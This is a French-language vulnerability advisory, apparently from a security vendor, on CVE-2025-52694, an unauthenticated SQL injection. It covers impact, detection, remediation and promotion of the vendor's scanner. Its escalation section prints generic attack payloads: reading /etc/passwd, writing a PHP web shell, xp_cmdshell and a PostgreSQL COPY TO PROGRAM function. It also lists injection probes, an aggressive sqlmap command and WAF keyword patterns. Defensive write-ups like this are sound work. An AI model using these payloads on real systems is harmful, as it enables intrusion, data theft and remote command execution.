CVE-2025-52694 : une injection SQL non authentifiée permet l'exécution de commandes arbitraires sur des services exposés
Une vulnérabilité d'injection SQL ne nécessitant aucune authentification permet à des attaquants distants d'exécuter des commandes SQL arbitraires sur des services vulnérables exposés à Internet, menaçant la confidentialité, l'intégrité et la disponibilité des données. CVSS 10.0.
| Champ | Détail |
|---|---|
| ID CVE | CVE-2025-52694 |
| Gravité | CRITIQUE (CVSS 3.1 : 10.0) |
| Type de vulnérabilité | Injection SQL (CWE-89) |
| Publié le | 12 janvier 2026 |
| Authentification requise | Aucune |
| Vecteur d'attaque | Réseau (exposé à Internet) |
Qu'est-ce que CVE-2025-52694 ?
CVE-2025-52694 est une vulnérabilité critique d'injection SQL dans un service exposé à Internet qui ne nécessite aucune authentification pour être exploitée. Les attaquants peuvent injecter des commandes SQL arbitraires directement dans les requêtes de base de données du service vulnérable, pouvant lire ou modifier l'intégralité du contenu de la base de données et — selon la configuration de la base de données — obtenir une exécution de code à distance sur le serveur sous-jacent.
L'injection SQL figure dans le OWASP Top 10 depuis sa création et reste redoutablement efficace lorsqu'elle est présente. Une injection SQL non authentifiée, accessible sur le réseau, avec un accès complet aux données, représente l'un des degrés de dangerosité maximal des vulnérabilités — d'où le score CVSS maximal.
Impact technique
⚠ Compromission complète de la triade CIA
Confidentialité : Tout le contenu de la base de données lisible — noms d'utilisateur, mots de passe, données personnelles, clés API, données financières.
Intégrité : Modification de données, suppression d'enregistrements, altération du schéma possibles.
Disponibilité : Attaques DoS (déni de service) via des requêtes consommant des ressources ; destruction de données possible.
Chemin d'escalade de l'injection SQL vers la RCE
Sur les bases de données dotées de fonctionnalités étendues activées, l'injection SQL peut évoluer vers une exécution de commandes au niveau du système d'exploitation :
-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');
-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';
-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';
-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
DECLARE result text;
BEGIN
EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || ''''';
RETURN result;
END;
$$ LANGUAGE plpgsql;
Versions concernées
Consultez l'avis du fournisseur pour connaître les informations spécifiques sur le produit et les versions. Toute version listée comme concernée et exposée au trafic Internet doit être traitée comme activement exploitable. Mettez à jour immédiatement vers les versions corrigées fournies par le fournisseur.
Méthodes de détection
Test manuel d'injection SQL
# Basic error-based detection # Append ' to parameters and observe error responses GET /search?q=test' HTTP/1.1 # Boolean-based blind detection GET /search?q=test' AND 1=1-- - # Should return normal results GET /search?q=test' AND 1=2-- - # Should return empty/different results # Time-based blind detection (confirm injection) GET /search?q=test'; WAITFOR DELAY '0:0:5'-- - # MSSQL GET /search?q=test'; SELECT SLEEP(5)-- - # MySQL # Use SQLMap for automated exploitation confirmation (authorized testing only) sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs
Examen des journaux WAF
Examinez les journaux de votre WAF ou de votre application à la recherche de motifs incluant des mots-clés SQL (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) dans les paramètres de requête. Une exploitation active de CVE-2025-52694 fera apparaître ces motifs.
🔍 Détection KENSAI : Le scanner d'injection SQL de KENSAI couvre les techniques d'injection basées sur les erreurs, aveugles, temporelles et hors bande. Les motifs d'injection de CVE-2025-52694 sont inclus dans notre bibliothèque de charges utiles et comparés à tous les vecteurs d'entrée, y compris les paramètres, les en-têtes et les champs de corps JSON/XML.
Étapes de remédiation
- Appliquer immédiatement le correctif du fournisseur : Mettez à jour vers la version corrigée telle que spécifiée dans l'avis du fournisseur.
- Requêtes paramétrées : Assurez-vous que toutes les requêtes de base de données utilisent des instructions préparées avec des entrées paramétrées — le seul correctif fiable contre l'injection SQL.
- Validation des entrées : Validez et nettoyez toutes les entrées fournies par l'utilisateur, en rejetant les métacaractères SQL lorsqu'ils ne sont pas nécessaires.
- Moindre privilège : Les comptes de base de données doivent disposer des permissions minimales requises — jamais d'accès
saou root à la base de données depuis les comptes applicatifs. - Règles WAF : Déployez ou mettez à jour les règles WAF pour détecter et bloquer les charges utiles d'injection SQL — il s'agit d'un contrôle compensatoire, pas d'un correctif.
- Désactiver les procédures stockées dangereuses : Désactivez
xp_cmdshellet les autres fonctions de base de données au niveau du système d'exploitation, sauf si explicitement requis. - Segmentation réseau : Les serveurs de base de données ne devraient jamais être directement accessibles depuis Internet.
Capacité de détection de KENSAI
KENSAI fournit une détection complète des injections SQL, y compris CVE-2025-52694 :
- Test d'injection automatisé sur tous les paramètres HTTP, en-têtes et champs de corps
- Détection d'injection basée sur les erreurs, aveugle booléenne, temporelle et basée sur UNION
- Empreinte de la base de données pour déterminer l'impact de l'exploitation
- Détection d'injection SQL de second ordre
- Conseils de remédiation associés à CWE-89 et OWASP A03:2021
Injection SQL dans votre stack ?
KENSAI analyse l'intégralité de votre surface d'attaque d'applications web à la recherche d'injections SQL et de plus de 200 autres vulnérabilités critiques. Ne laissez pas une injection SQL devenir une violation de données.
Analysez gratuitement les injections SQLPublié par l'équipe de recherche en sécurité KENSAI · Plus d'analyses de CVE